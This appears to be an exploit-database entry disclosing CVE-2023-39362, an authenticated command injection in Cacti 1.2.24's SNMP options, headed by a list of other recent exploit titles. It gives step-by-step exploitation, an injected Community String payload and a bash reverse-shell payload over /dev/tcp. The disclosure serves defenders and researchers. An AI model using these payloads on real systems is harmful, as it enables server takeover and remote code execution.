
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
65 lines
No EOL
3.2 KiB
Text
65 lines
No EOL
3.2 KiB
Text
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
|
|
# Date: 2023-07-03
|
|
# Exploit Author: Antonio Francesco Sardella
|
|
# Vendor Homepage: https://www.cacti.net/
|
|
# Software Link: https://www.cacti.net/info/downloads
|
|
# Version: Cacti 1.2.24
|
|
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
|
|
# CVE: CVE-2023-39362
|
|
# Category: WebApps
|
|
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
|
|
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
|
|
# Vulnerability discovered and reported by: Antonio Francesco Sardella
|
|
|
|
=======================================================================================
|
|
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
|
|
=======================================================================================
|
|
|
|
-----------------
|
|
Executive Summary
|
|
-----------------
|
|
|
|
In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.
|
|
|
|
-------
|
|
Exploit
|
|
-------
|
|
|
|
Prerequisites:
|
|
- The attacker is authenticated.
|
|
- The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
|
|
- A Device that supports SNMP can be used.
|
|
- Net-SNMP Graphs can be used.
|
|
- snmp module of PHP is not installed.
|
|
|
|
Example of an exploit:
|
|
- Go to "Console" > "Create" > "New Device".
|
|
- Create a Device that supports SNMP version 1 or 2.
|
|
- Ensure that the Device has Graphs with one or more templates of:
|
|
- "Net-SNMP - Combined SCSI Disk Bytes"
|
|
- "Net-SNMP - Combined SCSI Disk I/O"
|
|
- (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
|
|
- In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
|
|
public\' ; touch /tmp/m3ssap0 ; \'
|
|
- Click the "Create" button.
|
|
- Check under /tmp the presence of the created file.
|
|
|
|
To obtain a reverse shell, a payload like the following can be used.
|
|
|
|
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
|
|
|
|
A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).
|
|
|
|
----------
|
|
Root Cause
|
|
----------
|
|
|
|
A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
|
|
|
|
----------
|
|
References
|
|
----------
|
|
|
|
- https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
|
|
- https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
|
|
- https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application |